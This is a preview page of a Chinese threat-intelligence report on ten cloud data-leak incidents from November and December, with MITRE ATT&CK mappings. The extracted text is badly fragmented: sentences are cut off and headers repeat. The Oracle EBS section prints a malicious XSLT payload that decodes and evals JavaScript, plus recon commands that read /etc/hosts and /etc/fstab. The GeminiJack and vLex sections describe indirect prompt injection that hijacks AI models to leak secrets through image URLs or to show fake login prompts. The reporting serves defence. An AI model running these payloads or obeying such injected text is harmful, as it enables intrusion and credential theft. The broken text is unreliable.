全球云上数据泄露风险分析报告(第九期)-_第1页
全球云上数据泄露风险分析报告(第九期)-_第2页
全球云上数据泄露风险分析报告(第九期)-_第3页
全球云上数据泄露风险分析报告(第九期)-_第4页
全球云上数据泄露风险分析报告(第九期)-_第5页
已阅读5页,还剩59页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

云上数据泄露风险分析报告前言01全球11-12月云上数据泄露典型事件解读1事件一.大量AI初创企业因云资产配置不当导致核心凭证和私有模型数据在GitHub中泄露2事件二.React2Shell漏洞遭大规模在野利用,导致全球云环境面临RCE风险及挖矿木马植入4事件三.SaaS巨头Salesforce的第三方生态Gainsight遭攻击,超200家企业数据泄露8事件四.npm因ShaiHulud恶意软件供应链投毒导致数百组件泄露敏感环境凭证12事件五.DockerHub公共镜像仓库因开发者硬编码密钥导致数万镜像泄露敏感凭证,影响包括财富500强在内的百余家企业16事件六.ChatGPT存在SSRF漏洞导致攻击者可以诱导模型访问云元数据,进而泄露大量敏感Azure凭据19事件七.MongoBleed(CVE-2025-14847)漏洞导致MongoDB内存敏感数据泄露事件22事件八.OracleE-BusinessSuite因未授权RCE0day漏洞遭Cl0p团伙利用导致大规模数据窃取勒索,影响全球高校及跨国企业24事件九.GoogleGeminiJack“零点击”漏洞导致企业数据泄露事件十.vLexVincentAI因间接提示注入漏洞沦为钓鱼工具,致全球20万律所SSO凭证与敏感案卷面临窃取风险3102安全建议332.1针对社工类及系统入侵的安全建议342.2针对丢失和被窃取的凭证的安全建议3503总结3704参考文献39全球云上数据泄露风险分析简报(第九期)全球云上数据泄露风险分析简报(第九期)的社会工程学攻击正变得更加隐蔽和自动化。此外,开发运维(DevOps)环境下的凭证管理全球云上数据泄露风险分析简报(第九期)全球云上数据泄露风险分析简报(第九期)上数据泄露典型全球云上数据泄露风险分析简报(第九期)全球云上数据泄露风险分析简报(第九期)事件一.大量AI初创企业因云资产配置不当导致核心凭证和私有模型数据在GitHub中据全球云上数据泄露风险分析简报(第九期)全球云上数据泄露风险分析简报(第九期)却石沉大海或无果而终。这暴露出部分高速成长的科技公司在构建基本安全响应流程方面的VERIZON事件分类:BasicWebApplicationAttacks(基础W技术子技术利用方式T1552非安全凭证.001公开可获取的密钥通过公共代码仓库API获取包含密钥的代码T1589受害者身份信息收集.002员工姓名通过代码中的作者信息以及代码的提交者和拥有者等T1199信任关系利用N/A利用泄露的凭证信息建立信任链接https://www.wiz.io/blog/forbes-ai-50-leaking-secre/article/4087983/ai-startups-leak-sensitive-credentials-on-githuexposing-models-and-training-全球云上数据泄露风险分析简报(第九期)全球云上数据泄露风险分析简报(第九期)事件二.React2Shell漏洞遭大规模在野利几乎在漏洞公开后数小时至数天内,多个攻击团体开始在野外利用该漏洞进行扫描与攻击。AWS安全团队报告多个中国关联威胁组织(如EarthLamia和JackpotPanda)利用公开的漏洞利用代码迅速尝试入侵云端服务实例。攻攻击入口:ReactServerComponents的Flight协议全球云上数据泄露风险分析简报(第九期)全球云上数据泄露风险分析简报(第九期)核心缺陷:不安全的反序列化+可执行引用解析利用链关键点:RSCDecoder中的Gadget行为Promise解析与对象恢复阶段存在可Next.js中的放大效应利用结果:从代码执行到运行时持久化hookHTTPhandler读取环境变量、云凭证、容器元数据;在不落地文件的情况下维持隐蔽全球云上数据泄露风险分析简报(第九期)全球云上数据泄露风险分析简报(第九期)技术子技术利用方式T1190利用面向公众的应用程序N/A攻击者通过对外暴露的React/Next.js应用发送恶意Flight请求,直接利用RSC反序列化缺陷获取执行能力T1059命令和脚本解释器.007JavaScript漏洞最终在Node.js运行时中执行攻击者构造的JavaScript代码,实现任意逻辑执行T1203客户端执行的利用N/A利用服务器端组件解析逻辑,在组件执行阶段劫持执行流完成代码运行(服务器侧执行语义)T1027混淆文件或信息.010命令混淆通过混淆JavaScript载荷或动态拼接执行逻辑,规避基于规则的检测T1552未加密凭证.001文件中的凭证.005云实例元数据API利用RCE读取环境变量、配置文件中的云密钥、APIToken在云环境中通过代码执行访问实例元数据服务,获取临时云凭证T1082系统信息发现N/A执行系统与运行环境探测代码,识别容器、云平台、Node版本等T1021远程服务.004SSH在获取凭证后,部分攻击行为尝试进一步访问同环境下其他服务或主机T1496资源劫持部署加密挖矿脚本,占用受害服务器CPU/内存资源https://www.wiz.io/blog/critical-vulnerability-in-react-cve-2025-551https://www.wiz.io/blog/nextjs-cve-2025-55182-react2shell-deep-di全球云上数据泄露风险分析简报(第九期)全球云上数据泄露风险分析简报(第九期)态Gainsight遭攻击,超200家企业数据泄),从AppExchange下架相关应用。同一时间段Gainsight在事件页面确认正在调查作进行法证分析,并持续评估影响范围。威胁组织“ScatteredLapsus$Hunters/ShinyHunters”通过Teleg使用受影响集成的多个组织。Salesforce表示已直接已联系他们提供支持,并直接与他们合作。”全球云上数据泄露风险分析简报(第九期)全球云上数据泄露风险分析简报(第九期)高信任集成机制被滥用。攻击者通过获取或操纵Gainsight提供的Salesforce集成所使用的从攻击行为上看,此次事件更偏向于“批量数据抓取”而非破坏性攻击。攻击者主要利用全球云上数据泄露风险分析简报(第九期)全球云上数据泄露风险分析简报(第九期)技术子技术利用方式T1078-有效账户.004-云账户攻击者利用泄露的长期AWS访问密钥(IAMkeys)作为“有效凭证”直接访问AWS控制平面,随后调用GetCallerIdentity验证凭证并切换到云API操作,从而绕过传统登录拦截T1136-创建账户.003-云账户为保持持久性并抵抗凭证撤销,攻击者通过CreateUser/CreateAccessKey/CreateLoginProfile在受害者AWS账户内创建新IAM用户或访问密钥(云端创建账户以维持访问)T1578-修改云计算基础设施.001创建快照攻击者对RDS/EBS等创建快照(CreateDBSnapshot、CreateSnapshot)以采集原始数据,随后可将快照用于导出或挂载读取,作为数据收集核心手段T1578-修改云计算基础设施.002创建云实例攻击者使用RunInstances创建EC2实例并配置安全组(CreateSecurityGroup),用以挂载被创建的EBS快照并在其上读取/处理数据T1578-修改云计算基础设施.005-修改云计算配置攻击者修改计算/数据库配置(例如通过ModifyDBInstance修改RDS主用户密码以获取数据库访问),以及调整安全组规则使新建EC2可对外传输/接收流量,从而支持后续数据访问与外泄T1087-账户发现.004-云账户攻击者在获得权限后列举IAM相关信息(ListRoles、ListIdentities、ListAccountAliases、GetUser等API被用于发现可利用的账户与角色),用于判定可操作的目标账号与权限边界T1069-权限组发现.003-云群组攻击者枚举权限组/策略以识别可用于权限提升的群组或策略(通过ListRoles、GetAccount、GetUser等API了解当前权限集,从而决定是否需要创建新用户或附加策略)T1580-云基础架构发现N/A攻击者对网络(VPC、子网、路由表、SG)、计算(EC2)和存储(EBS、RDS、S3)的大规模枚举(Describe*、DescribeVolumes、DescribeDBInstances等),以绘制受害环境的云基础设施拓扑并定位高价值目标T1526-云服务发现N/A报告记载了对网络(VPC、子网、路由表、SG)、计算(EC2)和存储(EBS、RDS、S3)的大规模枚举(Describe*、DescribeVolumes、DescribeDBInstances等),以绘制受害环境的云基础设施拓扑并定位高价值目标T1619-云存储对象发现N/A攻击者通过ListBuckets、GetBucketLocation等S3发现API定位存储桶和对象位置,识别可供读取或用于导出数据的S3目标T1021-远程服务.007云服务攻击者利用云提供的远程服务能力(如在云端运行的EC2、利用SES发送邮件)作为操作平台:创建EC2并在其上处理/转存数据;并使用受害者的SES发出勒索信以增强影响T1530-来自云存储的数据N/A攻击者使用GetObject等S3API从受害者的S3存储中读取文件,或通过导出RDS快照到S3后读取这些对象,实现对云储存中数据的直接获取与窃取T1074-数据暂存.002远程数据暂存攻击者将导出的数据库快照/被读取对象临时存放在S3(或新建的EC2/存储位置)作为“中转/舞台”来汇集被窃数据,随后从该位置批量下载或转移到其它目的地。Rapid7指出使用StartExportTask将RDS快照导出到S3,为外泄准备阶段数据T1213-来自信息存储库的数据.003代码存储库该组织声称窃取RedHat的私有GitLab仓库(即面向代码仓库的数据窃取),攻击者可访问/克隆私有仓库以获取源代码、凭证或敏感配置T1567-通过Web服务进行外泄N/A攻击者通过受害者的云服务链条(如将快照导出到S3、在云内读取并调用GetObject)进行数据外泄;此外,使用SES或外部邮箱发送勒索通知为典型的“利用web/cloud服务完成外泄与敲诈”手法/2025/11/21/google-says-hackers-stole-data-from-200-companie/2025/11/26/gainsight_ceos_handful_customers_data_全球云上数据泄露风险分析简报(第九期)全球云上数据泄露风险分析简报(第九期)全球云上数据泄露风险分析简报(第九期)全球云上数据泄露风险分析简报(第九期)建恶意包,而是选择劫持现有且广泛使用的合法包(如@postman/窃取的GitHub令牌进行传播,将数据上传至其他全球云上数据泄露风险分析简报(第九期)全球云上数据泄露风险分析简报(第九期)VERIZON事件分类:LostandSt全球云上数据泄露风险分析简报(第九期)全球云上数据泄露风险分析简报(第九期)技术子技术利用方式T1195供应链攻击.002污染软件依赖NPM软件包污染T1552从非安全位置获取凭证N/A从受害者环境窃取凭证T1071应用层协议(WebAPI).001用于外泄数据通过API在GitHub创建仓库上传加密的凭证信息T1048替代协议进行数据泄露.003通过Web服务外泄数据在GitHub创建仓库上传加密的凭证信息T1588获取能力.002获取工具滥用TruffleHog等合法工具/news/security/shai-hulud-malware-infects-500-nppackages-leaks-secrets-on-github/https://www.wiz.io/blog/shai-hulud-2-0-ongoing-supply-chain-attackhttps://www.wiz.io/blog/shai-hulud-2-0-aftermath-ongoing-supply-chain-attack全球云上数据泄露风险分析简报(第九期)全球云上数据泄露风险分析简报(第九期)事件五.DockerHub公共镜像仓库因开发者硬编码密钥导致数万镜像泄露敏感凭证,影响包括财富500强在内的百余家企业泄露规模:网络安全公司Flare在2025年11月对全球最大的公共容器镜像仓库流水线乃至支付与计费系统的高权限访问。研究存储在镜像中的敏感信息,包括数据库凭证、云访见的问题是开发者在构建镜像时,将用于存储数据库凭证和云访问密钥的.env文件直接打包大量泄露镜像来源于承包商或员工个人使用的VERIZON事件分类:LostandS全球云上数据泄露风险分析简报(第九期)全球云上数据泄露风险分析简报(第九期)技术子技术利用方式T1593搜索开放网站/域.001公共代码仓库攻击者通过扫描DockerHub等公共镜像仓库,发现包含敏感信息的镜像T1552非安全存储凭证.001明文凭证密钥被硬编码或以明文形式存储在镜像、配置文件中T1078有效账号—利用泄露的云密钥、APIToken直接登录合法系统T1195供应链攻击—通过被污染镜像或凭证,进一步影响下游用户与系统/s/SdAA8iQM0dxnUQ3aJG全球云上数据泄露风险分析简报(第九期)全球云上数据泄露风险分析简报(第九期)者可以诱导模型访问云元数据,进而泄露大量敏感Azure凭据OAuth2访问令牌。该类令牌通常具备较高权限,可能导致云资源被完全控制,其行常规安全测试时,注意到其中的“Actions通过精心构造的配置,GPT后端服务器可能被全球云上数据泄露风险分析简报(第九期)全球云上数据泄露风险分析简报(第九期)协议限制。尽管Azure元数据服务默认要求请求中包含“MetadVERIZON事件分类:BasicWebApplicationAttacks(基础全球云上数据泄露风险分析简报(第九期)全球云上数据泄露风险分析简报(第九期)技术子技术利用方式T1190利用面向公众的应用程序—攻击者利用ChatGPT自定义GPT的Actions功能这一对用户开放的应用接口,诱导后端服务器发起非预期请求T1608阶段化能力.001上传恶意内容攻击者通过配置恶意OpenAPI定义和可控APIURL,将攻击逻辑注入自定义GPT的Actions配置中T1583获取基础设施.006Web服务攻击者控制外部HTTPSWeb服务作为中转点,通过302重定向将请求引导至云元数据服务T1552非安全存储凭证.005云实例元数据API通过SSRF访问Azure实例元数据服务(IMDS),直接获取OAuth2访问令牌等敏感凭证T1078有效账号—利用从云元数据服务中获取的OAuth2令牌,访问Azure管理API并执行合法但高权限的操作参考链接:/s/1JRKbqxU-全球云上数据泄露风险分析简报(第九期)全球云上数据泄露风险分析简报(第九期)漏洞导致MongoDB内存敏感数据泄露事件网络消息处理逻辑时发现,并被评定为8.7的高严重性漏洞。随后,Elastic安全研究员指出该漏洞利用门槛极低,极有可能引发大规模自动化扫描与攻击活动。VERIZON事件分类:BasicWebApplicationAttacks(基础全球云上数据泄露风险分析简报(第九期)全球云上数据泄露风险分析简报(第九期)技术子技术利用方式T1190利用面向公众的应用程序—攻击者直接与暴露在公网的MongoDB服务交互,发送畸形网络请求触发漏洞T1046网络服务发现—攻击者通过扫描互联网,识别开放27017端口的MongoDB实例作为攻击T1552非安全存储凭证.001明文凭证通过内存泄露获取数据库密码、APIKey、云访问密钥等敏感凭证T1005本地数据收集—从MongoDB进程内存中收集配置、日志、路径及客户端相关数据T1078有效账号—利用泄露的数据库或云凭证,进一步访问合法系统资源并扩大攻击范围/security/mongodb-mongobleed-vulnerability-exploi全球云上数据泄露风险分析简报(第九期)全球云上数据泄露风险分析简报(第九期)事件八.OracleE-BusinessSuite因未授权RCE0day漏洞遭Cl0p团伙利用导致大规模数据窃取勒索,影响全球高校及跨国企育与研究机构。包括美国常春藤盟校达特茅斯学院及宾夕法尼亚大学因使用Orac职工与学生的社会安全号码(SSN)、银行账户信息、医疗福利记录及薪2025年8月-9月,触发代码执行后,攻击者并未投放勒索病毒文件,而是利用Java反射在WebLogic/Tomcat进程中注册SAGEWAVE内存马(ServletFilter)。全球云上数据泄露风险分析简报(第九期)全球云上数据泄露风险分析简报(第九期)创建了一个藏有恶意代码的虚假模板。以下是存储在数据库中的有效payload示例,这些全球云上数据泄露风险分析简报(第九期)全球云上数据泄露风险分析简报(第九期)arp-aifconfig<?xmlversion="1.0"encoding="UTF-8"?><xsl:stylesheetversion="1.0"xmlns:xsl="/1999/XSL/Transform"xmlns:b64="/XSL/Transform/java/sun.misc.BASE64Decoder"xmlns:jsm="/XSL/Transform/java/javax.script.ScriptEngineManager"xmlns:eng="/XSL/Transform/java/javax.script.ScriptEngine"xmlns:str="/XSL/Transform/java/java.lang.String"><xsl:templatematch="/"><xsl:variablename="bs"select="b64:decodeBuffer(b64:new(),'<BASE64STRING>')"/><xsl:variablename="js"select="str:new($bs)"/><xsl:variablename="m"select="jsm:new()"/><xsl:variablename="e"select="jsm:getEngineByName($m,'js')"/><xsl:variablename="code"select="eng:eval($e,$js)"/>cat/etc/fstabcat/etc/hostsdf-hipaddrcat/proc/net/arp全球云上数据泄露风险分析简报(第九期)全球云上数据泄露风险分析简报(第九期)技术子技术利用方式T1190利用面向公众的应用程序N/A攻击者利用OracleEBSSyncServlet/UiServlet接口的0day漏洞(CVE-2025-61882)绕过认证进入网络。T1505服务器软件组件.003WebShell利用XSLT注入漏洞,在中间件内存中动态注册SAGEWAVE(JavaServletFilter)内存马,实现无文件持久化,规避文件查T1203利用客户端执行N/A(服务端侧利用)滥用XMLPublisher的XSLT解析引擎,通过“预览”功能触发恶意Java代码执行。T1005本地数据收集N/A利用applmgr账户权限,从数据库表中针对性提取师生SSN、财务记录等高敏感数据。T1486数据加密以产生影响N/A(变体:纯勒索)攻击者放弃传统加密手段,转而采用“数据窃取勒索”(DataStolenforExtortion),利用高校和企业对声誉及合规的顾虑进行胁T1078有效账号执行系统命令和数据库查询,将恶意行为混淆在正常业/blog/topics/threat-intelligence/oracle-ebusiness-suite-zero-da/security/pennsylvania-university-data-breach-oracl/news/security/dartmouth-college-confirms-data-breacafter-clop-extortio全球云上数据泄露风险分析简报(第九期)全球云上数据泄露风险分析简报(第九期)导致企业数据泄露隐蔽性:攻击者利用了浏览器的合法渲染行为,在用户眼皮底下的聊天气泡中完成数据事件回顾:2025年10月,安全公司NomaSecurity(NomaLabs)的研究人员在对),阶段一:Google文档投毒展示,链接格式为:/leak?dat阶段二:带毒文档投送(共享)阶段三:触发带毒文档阶段四:带毒文档被执行据”与“指令”,Gemini误以为这是用户的命令,于是放弃原任务,阶段五:利用浏览器渲染带毒指令导致敏感数据外泄AI服务端生成:Gemini将窃取到的密码拼接到URL中,生成了一段包含<imgsrc="/leak?data=密码...">的HTML代受害者的浏览器(Chrome/Edge等)在渲染聊天气泡时,解析到<img发送到了攻击者的服务器,至此秘钥信息被攻全球云上数据泄露风险分析简报(第九期)全球云上数据泄露风险分析简报(第九期)当成了系统指令执行,导致AI的核心大脑被劫持。另一方面Gemini的输出未对览器看到图片标签就会自动联网加载。攻击者利用所用MITREATT&CK技术T1566钓鱼.003通过服务发送诱饵攻击者利用GoogleDrive/Calendar的合法“共享”机制,将恶意文档推送到受害者的可访问范围内,无需受害者交互。T1059命令和脚本解释器N/A利用“间接提示注入”,通过文档中的隐藏文本覆盖AI的系统提示词,控制AI的行为逻辑。T1530来自云存储对象的数据N/A攻击者不直接入侵账户,而是劫持拥有合法高权限的AI助手,代理执行读取Gmail、Drive等敏感数据的操作。T1048使用替代协议渗漏N/A攻击者指示AI生成带有<imgsrc>标签的回复。受害者的浏览器在渲染聊天窗口时,自动向黑客服务器发起HTTP请求加载图片,数据通过URL参数被带出。T1027混淆文件或信息N/A攻击指令通过白色字体、微缩字号等方式隐藏在文档中,人类肉眼不可见,但AI可以读取并执行。/security/google-geminijack-zero-click-flaw-lgmail-calendar-docs/全球云上数据泄露风险分析简报(第九期)全球云上数据泄露风险分析简报(第九期)事件十.vLexVincentAI因间接提示注入漏证与敏感案卷面临窃取风险受影响单位:漏洞波及全球超过200000家律阶段一:文档投毒阶段二:载入(上传与索引)阶段三:触发不知情的律师在vLex界面中使用VincentAI功能(例如:“Vincent,帮我总结这份案卷阶段四:执行全球云上数据泄露风险分析简报(第九期)全球云上数据泄露风险分析简报(第九期)阶段五:钓鱼(伪造弹窗):上生成了一个极其逼真的伪造登录弹窗(例如提),阶段六:窃取(凭证外发):事件分析:导致此次事件发生的根因为:RAG架构的信任边另一方面:vLex的前端界面允许Vinc技术子技术利用方式T1566钓鱼.003通过服务发送诱饵攻击者利用vLex这一受信任的云服务平台作为媒介,通过上传含有恶意指令的文档,将钓鱼攻击投送给高价值的法律行业目标。T1059命令和脚本解释器N/A利用文档中的隐藏文本实施“间接提示注入”,覆盖VincentAI的系统提示词(SystemPrompt),劫持

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论